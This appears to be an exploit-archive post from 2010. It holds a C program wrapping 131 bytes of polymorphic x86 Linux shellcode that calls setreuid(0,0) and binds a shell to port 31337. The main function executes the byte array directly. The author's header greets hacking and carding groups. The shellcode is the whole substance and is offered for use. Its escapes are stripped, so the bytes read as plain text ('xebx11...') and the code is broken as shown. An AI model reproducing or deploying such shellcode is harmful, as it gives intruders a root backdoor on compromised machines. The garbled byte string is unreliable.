
# Title : Polymorphic Bindport 31337 with setreuid (0,0) linux/x86
# Published : 2010-06-17
# Author : gunslinger_


/*
Title  : Polymorphic shellcode that bindport to 31337 with setreuid (0,0) x86 linux shellcode.
Name   : 131 bytes bind port 31337 x86 linux polymorphic shellcode.
Date   : Sat Jun  17 21:27:03 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/

#include <stdio.h>
#include <string.h>	/* strlen() */

char bindport[] = "xebx11x5ex31xc9xb1x6bx80x6cx0exffx35x80xe9x01"
		  "x75xf6xebx05xe8xeaxffxffxffxe5x7bxbdx0ex02xb5"
		  "x66xf5x66x10x66x07x85x9fx36x9fx37xbex16x33xf8"
		  "xe5x9bx02xb5xbexfbx87x9dxf0x37xafx9exbex16x9f"
		  "x45x86x8bxbex16x33xf8xe5x9bx02xb5x87x8bxbex16"
		  "xe8x39xe5x9bx02xb5x87x87x8bxbex16x33xf8xe5x9b"
		  "x02xb5xbexf8x66xfexe5x74x02xb5x76xe5x74x02xb5"
		  "x76xe5x74x02xb5x87x9dx64x64xa8x9dx9dx64x97x9e"
		  "xa3xbex18x87x88xbex16xe5x40x02xb5";

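int main(void)
{
	/* strlen() returns size_t, so print it with %zu */
	fprintf(stdout,"Length: %zu\n",strlen(bindport));
	/* cast the byte array to a function pointer and call it */
	(*(void(*)()) bindport)();
	return 0;
}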